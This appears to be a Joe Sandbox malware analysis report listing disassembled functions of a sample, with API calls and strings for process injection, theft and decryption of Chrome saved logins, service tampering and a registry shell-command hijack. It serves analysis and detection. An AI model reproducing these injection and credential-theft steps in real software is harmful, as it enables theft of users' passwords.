Instruction ID: b74c1b420b2b9db9f6d3d8c1ab4c13cc911fce1bb09aa7ef56a459b38d9bf08e
Opcode Fuzzy Hash: 7a2fb275f9eb4e9b4af05cb2c2cff9a4da350a5e77a9d07bdb3636d47345a416
Instruction Fuzzy Hash: 4D219271640214BEF7209B65DC5AFEA3F7CEB05B50F204175FA45A61D0D6F02E458FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004114F4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176servicestringCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00553050,?,?,?,?,?,?,?,?,?,00411F8E,?,?), ref: 0041151D
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,00411F8E,00000000), ref: 00411554

Part of subcall function 00406F77: GetProcessHeap.KERNEL32(00000008,00000000,00403FDD,75A901C0,?,?,004141D5,75A901C0,?,?,75A901C0,00000000,?,00406AE0,00000000), ref: 00406F7A
Part of subcall function 00406F77: RtlAllocateHeap.NTDLL(00000000,?,004141D5,75A901C0,?,?,75A901C0,00000000,?,00406AE0,00000000,?,75A901C0,00000000), ref: 00406F81

EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,00411F8E,00000000), ref: 0041157D
GetLastError.KERNEL32 ref: 00411587
CloseServiceHandle.ADVAPI32(00000000), ref: 00411595
OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,?,?,00000002,00000000,00000000,?,00000000), ref: 00411659
lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0041169D

Strings

ServicesActive, xrefs: 00411503, 00411652

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
String ID: ServicesActive
API String ID: 899334174-3071072050
Opcode ID: 824f238de9823c23aebacca00796ac4a06b326411ff2bc5212d40380c69125f8
Instruction ID: 031d2f795c06a192762af131d3339c88f50cd6f76141b25563d88ec2f83aef88
Opcode Fuzzy Hash: 824f238de9823c23aebacca00796ac4a06b326411ff2bc5212d40380c69125f8
Instruction Fuzzy Hash: 0D518071E00219ABDF11DF91C885BEEB7B5EF88314F11006AE502B7290DB786E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409BFF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90injectionmemorythreadCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?), ref: 00409C2D

Part of subcall function 0040A95A: GetCurrentProcess.KERNEL32(0041E698,00409C1A,?,?,?), ref: 0040A95F
Part of subcall function 0040A95A: IsWow64Process.KERNEL32(00000000), ref: 0040A966
Part of subcall function 0040A95A: GetProcessHeap.KERNEL32 ref: 0040A96C

VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00409C51
VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00409C72
VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00409C8A
WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000006,00000000), ref: 00409CA5
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00409CC3
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409CDB

Strings

XXXXXX, xrefs: 00409C9E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
String ID: XXXXXX
API String ID: 813767414-582547948
Opcode ID: 7839047311c842babbce63383ff78ad70c2c1d2e629ecd078a4f07492a835a36
Instruction ID: c439ddf3e3c3905fe3b9c5401c014f7779d326cdd005718bd9fb68df2999ac29
Opcode Fuzzy Hash: 7839047311c842babbce63383ff78ad70c2c1d2e629ecd078a4f07492a835a36
Instruction Fuzzy Hash: CF21B271A05215BFFB2187618C05FFB3AACEB45751F244136FA12F11C1D7B89E00866E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C293 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(0041E6B0,00000104,?,00000000), ref: 0040C2B4
PathCombineA.SHLWAPI(?,?,00419E90), ref: 0040C2D3
FindFirstFileA.KERNEL32(?,?), ref: 0040C2E3
PathCombineA.SHLWAPI(?,0041E6B0,0000002E), ref: 0040C31A
PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 0040C329

Part of subcall function 0040BF94: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040BFB1
Part of subcall function 0040BF94: GetLastError.KERNEL32 ref: 0040BFBE
Part of subcall function 0040BF94: CloseHandle.KERNEL32(00000000), ref: 0040BFC5

FindNextFileA.KERNEL32(00000000,?), ref: 0040C341

Strings

., xrefs: 0040C2FE
Accounts\Account.rec0, xrefs: 0040C31C

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
String ID: .$Accounts\Account.rec0
API String ID: 3873318193-2526347284
Opcode ID: 4cc48b53985788a1ce4599ee3482fba80c0f27c003e3a11f779dc2af8a505717
Instruction ID: 77dc87b3fcf0f1c20af278af16ef1ee01a05ed7d7fbbe5ba93e78fea05be3af0
Opcode Fuzzy Hash: 4cc48b53985788a1ce4599ee3482fba80c0f27c003e3a11f779dc2af8a505717
Instruction Fuzzy Hash: 281163B1A0021CBBDB20DBA4DC89FEE776CEB44714F4045B7E905E2181D6789E888E68

Uniqueness

Uniqueness Score: -1.00%

Function 39D3DC2D Relevance: 14.0, Strings: 11, Instructions: 277COMMON

Download Yara Rule

Strings

kbdkor.dll, xrefs: 39D3DFF5
keyboardlayout.ini, xrefs: 39D3DC8E
kbdus.dll, xrefs: 39D3E007, 39D3E025, 39D3E03B
@, xrefs: 39D3DEF4
Layout ID, xrefs: 39D3DE38
kbdjpn.dll, xrefs: 39D3DFE3
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout, xrefs: 39D3DEB6
Substitutes, xrefs: 39D3DC9B
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 39D3DCE4
Attributes, xrefs: 39D3DDC4
Layout File, xrefs: 39D3DD73

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: @$Attributes$Layout File$Layout ID$Substitutes$\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout$\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layouts\$kbdjpn.dll$kbdkor.dll$kbdus.dll$keyboardlayout.ini
API String ID: 0-925059542
Opcode ID: b3bb0a3ce107d1b0e39f4f775e7e1d3080e32015a4cd1e889f275261c5636859
Instruction ID: 61afa796ea9df12566c222aefef434bcc3639089f1120b934f88948f2647c830
Opcode Fuzzy Hash: b3bb0a3ce107d1b0e39f4f775e7e1d3080e32015a4cd1e889f275261c5636859
Instruction Fuzzy Hash: BFB18C759112689FEB26CB60CC86BEA77BCEF48345F4044AAE509F7280D7749B85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004108A6 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-000000E1,?,?,00000000), ref: 00410938
BCryptDecrypt.BCRYPT(00000000,0000000C,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410966
EntryPoint.DBKYOVYK(00000001), ref: 00410979

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

EntryPoint.DBKYOVYK(00003177), ref: 004109C4
LocalFree.KERNEL32(0040FF12), ref: 004109EE

Strings

0, xrefs: 004108B7
v1, xrefs: 004108B1

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EntryHeapLocalPoint$AllocAllocateCryptDecryptFreeProcess
String ID: 0$v1
API String ID: 3703017342-3331332043
Opcode ID: 61ef484de3cb4f4aa2287c0f5fe909033a0a4efe415d08b813803cc428f956f0
Instruction ID: 2fcbe4913f478cd9f96edf62f6b46cbc2c8368e0ef6cb8adc2bf92b64d9b789e
Opcode Fuzzy Hash: 61ef484de3cb4f4aa2287c0f5fe909033a0a4efe415d08b813803cc428f956f0
Instruction Fuzzy Hash: CA4106B2D10208BBEB119BA5CC85BEFBBBCEF04354F04006AF845A2281E7B49D85C765

Uniqueness

Uniqueness Score: -1.00%

Function 004100DE Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 0040FB4B: PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,.tmp,00000000,004194E4,.tmp,00000000,004194E4,?,?,00000000), ref: 0040FC46
Part of subcall function 0040FB4B: PathFileExistsW.SHLWAPI(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FC5D
Part of subcall function 0040FB4B: CopyFileW.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 0040FC72

EntryPoint.DBKYOVYK(00000400,\Google\Chrome\User Data\Default\Login Data,\Google\Chrome\User Data\Local State,00000000,00000000,00000001,?,?,00000000,?,?,?,0040ED74), ref: 00410108

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

wsprintfW.USER32 ref: 00410117
EntryPoint.DBKYOVYK(00000400,?,?,0040ED74), ref: 00410125

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Part of subcall function 0040FB4B: CopyFileW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 0040FC86
Part of subcall function 0040FB4B: lstrlenW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FC9E
Part of subcall function 0040FB4B: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040FCB5
Part of subcall function 0040FB4B: lstrlenW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FCD0
Part of subcall function 0040FB4B: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0040FCE5
Part of subcall function 0040FB4B: lstrlenW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FCFA
Part of subcall function 0040FB4B: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0040FD13
Part of subcall function 0040FB4B: lstrlenW.KERNEL32(00000000), ref: 0040FD64
Part of subcall function 0040FB4B: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040FD7A
Part of subcall function 0040FB4B: lstrlenW.KERNEL32(?), ref: 0040FD8F

Strings

\Google\Chrome\User Data\Local State, xrefs: 004100EC, 00410148
Profile %d, xrefs: 00410111
t@, xrefs: 0041013C
\Google\Chrome\User Data\Default\Login Data, xrefs: 004100F3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$FileHeap$ByteCharCopyEntryExistsMultiPathPointProcessWidelstrcpy$AllocateFreewsprintf
String ID: Profile %d$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$t@
API String ID: 434880646-1042253291
Opcode ID: b4933edac71b5f1dd4d74afa2006618ab8ce081f37552d1a750e9d87aeaa5d2c
Instruction ID: 58719d553a00b7db81f8bdf261d458f68d9fb816de9e26099e2a2e343b6a6765
Opcode Fuzzy Hash: b4933edac71b5f1dd4d74afa2006618ab8ce081f37552d1a750e9d87aeaa5d2c
Instruction Fuzzy Hash: D0F0A4717803003AE221A6655C87FAF2658C781B5DF20403FF301BA1C2E5ED6D95406D

Uniqueness

Uniqueness Score: -1.00%

Function 00410DF8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,?,00000001,?,00411640,?,00000002,00000000,00000000,?,00000000), ref: 00410E07
OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,?,00411640,?,00000002,00000000,00000000,?,00000000), ref: 00410E1C
CloseServiceHandle.ADVAPI32(00000000,?,00411640,?,00000002,00000000,00000000,?,00000000), ref: 00410E29
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00411640,?,00000002,00000000), ref: 00410E42
CloseServiceHandle.ADVAPI32(00000000,?,00411640,?,00000002,00000000,00000000,?,00000000), ref: 00410E56
CloseServiceHandle.ADVAPI32(00000000,?,00411640,?,00000002,00000000,00000000,?,00000000), ref: 00410E59

Strings

ServicesActive, xrefs: 00410DFF

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: ServicesActive
API String ID: 493672254-3071072050
Opcode ID: 2ca01b81d4fb11968b80b0b3d390d245743f710f7d4149a3a1a7075cb9c8c915
Instruction ID: 9a1f572a8b3bee0d339481008231b566a61bd74dcb3764367a525787b660cdb4
Opcode Fuzzy Hash: 2ca01b81d4fb11968b80b0b3d390d245743f710f7d4149a3a1a7075cb9c8c915
Instruction Fuzzy Hash: C7F0C23160432177DB201727AC48EDB3E5CDF8AB707108632FA15E6290CAA5CD81C6B8

Uniqueness

Uniqueness Score: -1.00%

Function 39CEC9B9 Relevance: 11.7, Strings: 9, Instructions: 427COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2011/WindowsSettings, xrefs: 39CED004
\Windows, xrefs: 39CECB4A, 39CECB97
true, xrefs: 39CED011, 39CED01A, 39CED054
Dummy string, xrefs: 39CEC9EB
\Sessions, xrefs: 39CECB50
http://schemas.microsoft.com/SMI/2014/WindowsSettings, xrefs: 39CED043
disableWindowFiltering, xrefs: 39CECFFF
%ws\%ld%ws, xrefs: 39CECB55
forceFocusBasedMouseWheel, xrefs: 39CED03E

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: %ws\%ld%ws$Dummy string$\Sessions$\Windows$disableWindowFiltering$forceFocusBasedMouseWheel$http://schemas.microsoft.com/SMI/2011/WindowsSettings$http://schemas.microsoft.com/SMI/2014/WindowsSettings$true
API String ID: 0-3291457261
Opcode ID: 681022ba121c5d10db466e60ea738560956e18604de6532cddb8fa53bb53b732
Instruction ID: aafbf7b7e6120ff2706da49356361c7dae4e0eead2fb4bb88f7c41b009c4fe81
Opcode Fuzzy Hash: 681022ba121c5d10db466e60ea738560956e18604de6532cddb8fa53bb53b732
Instruction Fuzzy Hash: 7FF1D2B1941284DFE711DFA6E94BA5A7BF8BB8C781F408429F507E7640DB349802CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00415774 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryCOMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001,75C5AE80,?,?,?,?,?,?,?,?,00415A15), ref: 00415781
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,00415A15), ref: 00415795
RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,?,00415A15), ref: 004157CD
RegCloseKey.ADVAPI32(?), ref: 004157DA
SetLastError.KERNEL32(00000000), ref: 004157E5

Strings

Software\Classes\Folder\shell\open\command, xrefs: 004157C3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
String ID: Software\Classes\Folder\shell\open\command
API String ID: 1473660444-2536721355
Opcode ID: 1496b1c26ae5b8a6941e6a8ff27ddfbea377bbc9533598532237ca76d5628d9e
Instruction ID: 00cdae35b5ef361f0fa6a77024ce444bebae4a1855808506b66890a70d859341
Opcode Fuzzy Hash: 1496b1c26ae5b8a6941e6a8ff27ddfbea377bbc9533598532237ca76d5628d9e
Instruction Fuzzy Hash: 1201DA71A01228FADF209BA19C49EDFBFBCEF49750F004166F515F2180E7749A84CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00410620 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,00000000,00000000,00000000,?,?,004103CB,?), ref: 0041063D
BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,004103CB,?), ref: 00410656
BCryptGenerateSymmetricKey.BCRYPT(00000020,004103CB,00000000,00000000,?,00000020,00000000,?,004103CB,?), ref: 0041066B

Strings

ChainingModeGCM, xrefs: 0041064A
AES, xrefs: 00410633
ChainingMode, xrefs: 0041064F

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
String ID: AES$ChainingMode$ChainingModeGCM
API String ID: 1692524283-1213888626
Opcode ID: 46607b318ca1b380f02ef2ba6255d435d1751c47daaccbe285aecce13c596cd2
Instruction ID: 64abf8964becf4fbe36e652720c0db7f3f4f14f3d21c5adf0b87354567d97a0b
Opcode Fuzzy Hash: 46607b318ca1b380f02ef2ba6255d435d1751c47daaccbe285aecce13c596cd2
Instruction Fuzzy Hash: EFF04F35301325BADB200B56CC09EDBBFACEF4ABA4B108026F505D2152D7A15C5086E8

Uniqueness

Uniqueness Score: -1.00%

Function 00413DA4 Relevance: 9.1, APIs: 6, Instructions: 111stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406FA7: GetProcessHeap.KERNEL32(00000000,000000F4,0041424F,?,75A901C0,00000000,00406ACF,?,75A901C0,00000000), ref: 00406FAA
Part of subcall function 00406FA7: HeapAlloc.KERNEL32(00000000,?,75A901C0,00000000), ref: 00406FB1

GetLogicalDriveStringsW.KERNEL32(00000104,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403C90), ref: 00413DE1
GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403C90), ref: 00413E10
GetDriveTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403C90), ref: 00413E45
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00403C90), ref: 00413E5D
lstrcpyW.KERNEL32(00000000,?), ref: 00413E76
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00403C90), ref: 00413E98

Part of subcall function 00406F8D: GetProcessHeap.KERNEL32(00000000,-00000004,004024B3,75A901C0,?,75A901C0,00402C48,00000000,75A901C0,?,00000000,?,00414201,75A901C0,?), ref: 00406F94
Part of subcall function 00406F8D: RtlFreeHeap.NTDLL(00000000,?,00414201,75A901C0,?), ref: 00406F9B

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$Drive$LogicalProcessStringslstrlen$AllocFreeTypelstrcpy
String ID:
API String ID: 155130961-0
Opcode ID: 71e6a3fdb86a4b9427acb813d14c692863300f7e1dc0a52ec528677186d126c0
Instruction ID: b30e7b87b89ac3955b835985977ad009c62a63f4a3879ccd80f3b87534891449
Opcode Fuzzy Hash: 71e6a3fdb86a4b9427acb813d14c692863300f7e1dc0a52ec528677186d126c0
Instruction Fuzzy Hash: E0319271E002159BCB01EFB9D8959EEBBB4AF88704F10806EF416B7290DB385E41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004160C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004160D2
Process32First.KERNEL32(00000000,00000128), ref: 00416102
CloseHandle.KERNEL32(00000000,?,?,75A901C0), ref: 00416141

Strings

explorer.exe, xrefs: 00416110

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID: explorer.exe
API String ID: 1083639309-3187896405
Opcode ID: 635d9d2de2c03e435c222c21087e37fae9f36d5a313260e8d00a6f5c256c91c4
Instruction ID: 8068fca9d3c3272d7a5e62606043fee22335ad7daeb74cc7595c24ab911dc80e
Opcode Fuzzy Hash: 635d9d2de2c03e435c222c21087e37fae9f36d5a313260e8d00a6f5c256c91c4
Instruction Fuzzy Hash: 7501DB31A001657BDB2197249C49FEA77BCAB05310F0040BAF545E51C2E778DED58B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,-00000001,75A8E8E0,?,?,?,0040CC18,00001000,?,00000000,00001000), ref: 0040CC89
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040CC18), ref: 0040CCBF
lstrcpyW.KERNEL32(?,Could not decrypt), ref: 0040CCF6

Strings

Could not decrypt, xrefs: 0040CCF0

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AllocCryptDataGlobalUnprotectlstrcpy
String ID: Could not decrypt
API String ID: 3112367126-1484008118
Opcode ID: 9fff886042136f5fe55d09c7f80efd112adc36efeab094fee4eba997abc1367d
Instruction ID: 66ffbbbe551c130b0b68c2423bd544961bd6c3707f7228415453a5b24832c9ea
Opcode Fuzzy Hash: 9fff886042136f5fe55d09c7f80efd112adc36efeab094fee4eba997abc1367d
Instruction Fuzzy Hash: 6211CA72D04215EBD711CB99C8849DEF7BDEF48704B10417AE956F3251E6359E01CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 39D3EB3B Relevance: 6.6, Strings: 5, Instructions: 358COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Services\i8042prt\Parameters, xrefs: 39D3ECD2
kbdus.dll, xrefs: 39D3EBAC, 39D3EF93, 39D3EFA2
OverrideKeyboardSubtype, xrefs: 39D3ED89
@, xrefs: 39D3ED14
OverrideKeyboardType, xrefs: 39D3ED39

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: @$OverrideKeyboardSubtype$OverrideKeyboardType$\Registry\Machine\System\CurrentControlSet\Services\i8042prt\Parameters$kbdus.dll
API String ID: 0-755715994
Opcode ID: 21605df71eac14ff44d5f11c5fffb17b847a983b4f25e8526593965bf6f1731e
Instruction ID: 9a8781ae296b5a1b10ea8d23817bbc616cdf5c0cc157c501b2ba1da99e79c08b
Opcode Fuzzy Hash: 21605df71eac14ff44d5f11c5fffb17b847a983b4f25e8526593965bf6f1731e
Instruction Fuzzy Hash: 76E165B4901359DFDB20CF64CC8AB99B7B8FF48741F4044A9E609E7181DB74AA85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00413C83 Relevance: 6.1, APIs: 4, Instructions: 92filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?), ref: 00413CB4
lstrlenW.KERNEL32(?), ref: 00413D29
lstrcpyW.KERNEL32(00000000,?), ref: 00413D3F
FindNextFileW.KERNEL32(00000000,?), ref: 00413D6E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextlstrcpylstrlen
String ID:
API String ID: 4153965504-0
Opcode ID: 4557bb0f96bd02de139df7a73b721452cb89c5cef8538ec25ec9b713f32ad8bf
Instruction ID: c748cb00d811a330797d304e2187daf82e17078aaf6005902731beaef75247ef
Opcode Fuzzy Hash: 4557bb0f96bd02de139df7a73b721452cb89c5cef8538ec25ec9b713f32ad8bf
